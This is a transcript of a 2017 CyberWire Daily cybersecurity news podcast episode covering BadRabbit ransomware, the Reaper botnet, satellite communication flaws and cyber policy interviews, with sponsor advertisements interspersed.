CyberWire Daily - BadRabbit ransomware and Reaper botnet updates. SATCOM bugs. ICS cybersecurity notes. Moscow's free commercial speech piety. Anonymous is back.
Episode Date: October 27, 2017In today's podcast, we hear that BadRabbit, still quiet, looks like a TeleBots product. Reaper is still locked and loaded, but is also still quiet. Maritime SATCOM system found to be buggy, and ...the worse news is that it's beyond its end-of-life. A look back at the annual ICS Cybersecurity Summit that wrapped yesterday in Atlanta. Moscow tells Twitter buying ads is a free speech issue. Justin Harvey from Accenture on monitoring cloud infrastructure. Guest is Michael Sulmeyer, Director of the Cyber Security Project at the Harvard Kennedy School’s Belfer Center for Science and International Affairs. Anonymous is back and poking at the Spanish government. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K.
Air Transat presents two friends traveling in Europe for the first time and feeling some pretty big emotions.
This coffee is so good. How do they make it so rich and tasty?
Those paintings we saw today weren't prints. They were the actual paintings.
I have never seen tomatoes like this.
How are they so red?
With flight deals starting at just $589,
it's time for you to see what Europe has to offer.
Don't worry.
You can handle it.
Visit airtransat.com for details.
Conditions apply.
AirTransat.
Travel moves us.
Hey, everybody.
Dave here.
Have you ever wondered where your personal information is lurking online?
Like many of you, I was concerned about my data being sold by data brokers.
So I decided to try Delete.me.
I have to say, Delete.me is a game changer.
Within days of signing up, they started removing my personal information from hundreds of data brokers.
I finally have peace of mind knowing my data privacy is protected.
Delete.me's team does all the work for you with detailed reports so you know exactly what's been done.
Take control of your data and keep your private life private by signing up for Delete.me.
Now at a special discount for our listeners.
private by signing up for Delete Me. Now at a special discount for our listeners,
today get 20% off your Delete Me plan when you go to joindeleteme.com slash n2k and use promo code n2k at checkout. The only way to get 20% off is to go to joindeleteme.com slash n2k and enter code
n2k at checkout. That's joindeleteme.com slash N2K, code N2K.
Bad rabbit, be a good rabbit and stay in your hutch.
Don't listen to sandworm. Reaper is still locked and loaded, but quiet.
Maritime satcom system is found to be
buggy, and the worst news is that it's beyond its end of life. A look back at the annual ICS
cybersecurity summit that wrapped yesterday in Atlanta. Moscow says buying ads is a free speech
issue. And who knew the Kremlin was such a nest of civil libertarians? Anonymous is back and poking at the Spanish government.
I'm Dave Bittner in Baltimore with your CyberWire summary for Friday, October 27, 2017.
Bad Rabbit seems for now quiet as a bunny, but it wouldn't do it all to expect that to continue.
Cisco researchers found a variant of the alleged NSA equation group Eternal Romance tool in Bad Rabbit's code. And consensus among security researchers and other
companies is that Bad Rabbit is the work of the threat actors behind NotPetya. That would be the
Telebots APT, also known as Sandworm, which has in the past been associated with Russian security
services, especially in operations directed against Ukraine.
The damage done in Bad Rabbit's brief period of activity
doesn't remotely approach that achieved by NotPetya,
but of course, Bad Rabbit could well return.
A majority of the targets Bad Rabbit hit were Russian, around 65%,
but observers note that the high-value targets it clobbered were Ukrainian.
Much reporting continues to treat Bad Rabbit as conventional criminal ransomware,
but it's too early to tell, and Telebot's alleged involvement may point in a different direction.
What's not dispositive in the still-tenuous attribution is the high rate of attack against
Russian targets. It might be ordinary crime, it might be misdirection on the backs of the little people, or it might
be a mistake, which could explain why the attack infrastructure came down so quickly.
The Reaper IoT botnet, also known as IoTroop, is still assembled and poised, but has yet
to unleash the expected distributed denial-of-service attack.
Researchers at NuS Sky Security, however,
have observed disturbing signs in the cybercriminal underground
that hackers are sharing malicious code
suitable for integration with the botnet.
IOactive reports vulnerabilities
in Inmarsat's widely used Maritime SATCOM system.
Users of communication systems
running the AmosConnect8 platform could be susceptible
to a blind SQL injection flaw or access to full administrative privileges. The former bug would
permit an attacker to gain access to other users' credentials. The second flaw would give an attacker
the ability to execute commands on the system. There is no patch for the issues, and none is
planned. Amos Connect 8
reached its end of life, and Inmarsats retired the platform from its product line. If you're
still using it, masters and commanders, maybe it's time to upgrade. Security Week's ICS Cyber
Security Conference closed yesterday. We'll be publishing more of our own accounts of the
proceedings on thecyberwire.com over the course of next week.
In the meantime, a few quick reflections on the conference are in order.
The operators of industrial control systems continue to believe that cybersecurity remains too IT-centric.
This is natural.
The cybersecurity sector emerged largely from the larger IT sector,
and it brought with it concerns about privacy and information assurance.
But the problem the plant operators see is that a fixation on information tends to lead
to a disregard of physics, and here they mean the actual physical operation of industrial
systems, and the actual physical consequences of system failure, kinetic consequences if
you wish to borrow common military language.
As one of the speakers put it in a bit of quick advice to the security community, please forget fail fast. There
is no agile. Failure is not an option. Plant operations have to be highly available. They have
to be reliable, and above all, they have to be safe. But perhaps some of the usual tropes about
mutual misunderstanding
between those concerned with IT and those concerned with OT are simply misguided. By
yesterday afternoon, as the event wrapped up, there was an emerging consensus that the way
to understand the issue is in terms of a before and after. Before the packet and after the packet,
as industrial control system maven Joe Weiss put it, at the open mic session the conference closed with.
What goes on physically before the packet is where the system's ground truth is to be found,
and it's there that one finds the unaddressed security and safety issues.
Twitter's newfound fastidiousness about accepting Russian ads
has drawn protest from the Russian government,
which feels this is unfair to Sputnik and RT.
It's not clear how Twitter and other social media platforms
will be able to police their users' content.
It's even less clear how they'll do it in an acceptably neutral way.
But those unlikely free speech advocates in the Kremlin
are going to be a tough crowd.
Russian government spokesperson Maria Zakharvona said that because
ad buys are a free speech issue, note that Twitter's not blocking RT or Sputnik, just
declining to sell them ads, the Russian government will take unspecified measures. She wrote,
piously, we see this as another aggressive step aimed at blocking the activities of Russian TV
channel Russia Today, and it is the result of pressure from part of the American establishment and special services.
And finally, in an unrelated story, Anonymous has resurfaced,
attacking Spanish government sites in apparent solidarity with the Catalan independence movement.
Several hackerweight of Guy Fawkes' masked bravos are committing various nuisance attacks,
but these don't appear to have risen to the level of a serious threat to public order
or the physical integrity of the Kingdom of Spain.
Calling all sellers!
Salesforce is hiring account executives to join us on the cutting edge of technology.
Here, innovation isn't a buzzword.
It's a way of life.
You'll be solving customer challenges faster with agents,
winning with purpose, and showing the world what AI was meant to be.
Let's create the agent-first future together.
Head to salesforce.com slash careers to learn more.
Head to salesforce.com slash careers to learn more. programs, we rely on point-in-time checks. But get this, more than 8,000 companies like Atlassian and Quora have continuous visibility into their controls with Vanta. Here's the gist. Vanta brings
automation to evidence collection across 30 frameworks, like SOC 2 and ISO 27001.
They also centralize key workflows like policies, access reviews, and reporting,
and helps you get security questionnaires done five times faster with AI. Now that's a new way
to GRC. Get $1,000 off Vanta when you go to vanta.com slash cyber. That's vanta.com slash cyber
for $1,000 off.
In a darkly comedic look
at motherhood and society's expectations,
Academy Award-nominated
Amy Adams stars as a passionate
artist who puts her career on hold
to stay home with her young son.
But her maternal instincts take a wild and surreal turn as she discovers the best yet fiercest part of herself.
Based on the acclaimed novel, Night Bitch is a thought-provoking and wickedly humorous film from Searchlight Pictures.
Stream Night Bitch January 24 only on Disney+.
And now a message from Black Cloak.
Did you know the easiest way for cybercriminals to bypass your company's defenses
is by targeting your executives and their families at home?
Black Cloak's award-winning digital executive protection platform
secures their personal devices, home networks, and connected lives. Because when executives are compromised at home, Thank you. with Black Cloak. Learn more at blackcloak.io.
And joining me once again is Justin Harvey. He's the Global Incident Response Leader at Accenture.
Justin, good to have you back. You know, I still talk to people who say that in response to moving things to the cloud, they say, you know, I like to have my stuff in-house. I like to be able to go
and hug my servers and know that they're right here my stuff in-house. I like to be able to go and hug my
servers and know that they're right here where I can see them and I know what they're up to.
And I think a lot of that comes down to their ability to monitor things. And you wanted to
talk today about feeling comfortable with working with the cloud. Yeah, I think that that is a great
concern that is shared by many global organizations. But what you'll find is a trend
that more and more companies are moving to the cloud and not just companies in general,
but I never thought that I would live to see the day that more financial services institutions are
moving their transactional and customer data to the cloud, given that financial services has been a lot more risk averse than other
industries. And I think that a lot of that is due to not only the cost efficiency, but when it comes
down to it, there has been innovations in leaps and bounds around not only the physical security,
around not only the physical security, but the online security and monitoring telemetry around cloud data centers through Microsoft and Amazon.
So we're seeing a lot more companies migrate to that.
And the feedback I keep hearing is companies don't feel that we can do it as effectively
as Microsoft and Amazon and the
other cloud providers. So that's really one of the big values there. As far as a monitoring
perspective goes, there is this bumper sticker and or shirt and or laptop sticker I keep seeing
that really bothers me. And the sticker reads, the cloud is just your data or your system in someone else's
data center. And up till the last few years, that has been true. However, with Microsoft and Amazon
making big strides in platforms as a service and infrastructure as a service and the ability to deploy whole systems, whole
platforms into the cloud without even using a container-based service.
I'm thinking of Amazon's Elastic Beanstalk and Lambda functions.
There's really a huge knowledge gap there for companies and thinking through how do
we monitor that? Both of the major
cloud providers have issued new APIs and new cloud monitoring standards that while, yes, you can
wire your entire cloud infrastructure for getting immediate feedback and telemetry,
you can load that
into your log management solution, it becomes a lot more effective to essentially adopt the new
cloud monitoring strategies that are out there and not only store your data, your customer data,
or your business data in the cloud, but to also store your logs up there and essentially use the cloud on itself to do your threat hunting in your cloud monitoring.
All right. Justin Harvey, thanks for joining us.
My guest today is Michael Solmeyer. He's the Belfer Center Cybersecurity Project Director
at the Harvard
Kennedy School. Before Harvard, he served in the office of the Secretary of Defense as the Director
for Plans and Operations for Cyber Policy. I began our conversation by asking Michael Solmeyer to
describe the mission of the Belfer Center at Harvard. Several decades ago, this place really
became the home for thinking about new doctrine and strategic concepts at the dawn of the Cold War.
The idea was that we could build something similar for cybersecurity and how states are behaving in cyberspace today.
There's been a lot of work in academia and in think tanks about privacy and about surveillance, which is very important work to get done, but much less about how states pursue their interests through cyberspace and use cyber operations as a tool of hard power. And that's very much in line with the original founding concepts of the Belfer Center. And so that's what we're now trying to channel as we look at
state behavior in this new domain of cyberspace. And why do you think that it's something that
hasn't gotten the attention of some of the other areas of cybersecurity?
some of the other areas of cybersecurity? In part, it's because this component of the field about operations and the exercise of power has been more classified and more sensitive
than a lot of other areas. And only in the last five or six years, I think, has the government,
the U.S. government, been willing to talk
more publicly about its activities in cyberspace. And you're also seeing a number of people who've
had experience with these kinds of operations and their oversight from government leave government and come out to academia and to centers of excellence for research
and be able to write about it and be able to talk about it that is a relatively new
development but the the idea of computer security obviously is not very new. Great book called The Cuckoo's Egg by Clifford Stoll that came out in, I think, 1989
talks all about this kind of stuff. But what's more new is how governments are finally beginning
to talk about it. What's your estimation of where things stand right now in terms of cyber policy?
What is the current state?
It's a good question.
It's a broad question. But I think largely what we see today is a reflection more of not so great defense as opposed to brilliant offense.
defense. We face a lot of challenges, especially in the United States, but not exclusively here,
but especially here about systematically improving our defenses, right? And that's really hard because we were first. Internet was created here. So many of the companies that now dominate the
space were created here. So in some sense, we have some of the oldest infrastructure and are more
dependent on it. That leads to real challenges when you're trying to systematically improve
defenses, not just across the government, but across businesses and operators of
critical infrastructure. Very hard. And how do you see the research that you do making its way out into the world?
Almost easier for academics to think about researching and writing and publishing,
because that's so much of the game to be successful in academia. What often is not
thought so much about is marketing. How do you take this important piece
of research that you've done and actually get it into the hands of people that could do something
with it? So the first step is, you know, we always try to make sure that there are actionable
recommendations in the papers that we write. You can't just be admiring a problem.
You have to make concrete recommendations to make a difference and improve things.
And what I found then is through different travels and meetings, especially on Capitol Hill
with legislative staff.
It's a great opportunity to share some of the work that we've done.
And there's always a good open reception to new ideas and suggestions for legislation.
And so I find that Capitol Hill is a great place to take our products and have conversations with staffers about what's on their mind,
what can we do, what can we write about next that would be interesting and policy relevant.
And, oh, by the way, here's something that we answered for a colleague of yours.
What do you think?
That's interesting to me because one thing we've talked about several times here on the Cyber Wire is how many of our legislators,
and even looking at the Supreme Court and certainly also in the executive branch,
just by the virtue of these people being older, many of them are not digital natives.
And so a lot of this sort of thing isn't reflexive to them.
So it's interesting to me to hear you talk about interactions, particularly with their staff, and how
receptive they are to the types of things that you're sharing.
Yes, absolutely. And the staff often are quite young.
Yeah. And I think what you do see on the part of legislators
across the age range and experience range
is a frustration with the
current state of affairs right i mean so they've appropriated so much money
into different cyber security initiatives and yet the breaches keep happening
senator mccain i don't think gets enough credit for being one of the most outspoken legislators
about his frustrations that we're not, as a country, deterring this kind of bad behavior.
Why is that? So questions he's been asking at recent hearings are the right questions
to be asking, and they're coming from one of the most experienced members in the Senate.
Where do you see the United States being in terms of our leadership position?
Are we still leading the way in the cyber domain?
I do think the very fact that the United States has been in the business for so long,
both of trying to protect our own infrastructure,
been in the business for so long, both of trying to protect our own infrastructure, but also understanding how to pursue U.S. national interests through cyberspace as well, it still gives us a
lot of capability in that space. So I'd still say that while we may not have the great position of dominance that we had 10 or 15 years ago,
a lot of others have caught up. We still have some pretty amazing reach and some pretty amazing
capabilities. I think what you want to be looking forward a little bit,
one thing that we're still waiting on is how our government is going to adjudicate really who's accountable when things go wrong and a cybersecurity incident happens.
There really hasn't been any accountability.
And right now, when there's a breach like Equifax that we read about from the last couple weeks or other things who who gets left holding the bag but the
victim right right and at some point government has generally come in in new areas of technology
think the automobile you know other other areas and in the name of safety or other reasons
fundamental fairness sometimes has adjudicated really
who's going to be accountable and shaped economic incentives accordingly to sometimes
promote a little greater attention on safety.
And I think right now we're waiting to see if the United States government and the Congress is going to
play that kind of a role when it comes to cybersecurity.
That's Michael Solmeier from the Belfer Center's Cybersecurity Project
at the Harvard Kennedy School.
Thank you. of solutions designed to give you total control, stopping unauthorized applications, securing sensitive data, and ensuring your organization runs smoothly and securely. Visit ThreatLocker.com
today to see how a default-deny approach can keep your company safe and compliant. And that's The Cyber Wire.
We are proudly produced in Maryland by our talented team of editors and producers.
I'm Dave Bittner. Thanks for listening. Thank you. comes in. With Domo, you can channel AI and data into innovative uses that deliver measurable
impact. Secure AI agents connect, prepare, and automate your data workflows, helping you gain
insights, receive alerts, and act with ease through guided apps tailored to your role.
Data is hard. Domo is easy. Learn more at ai.domo.com.
That's ai.domo.com.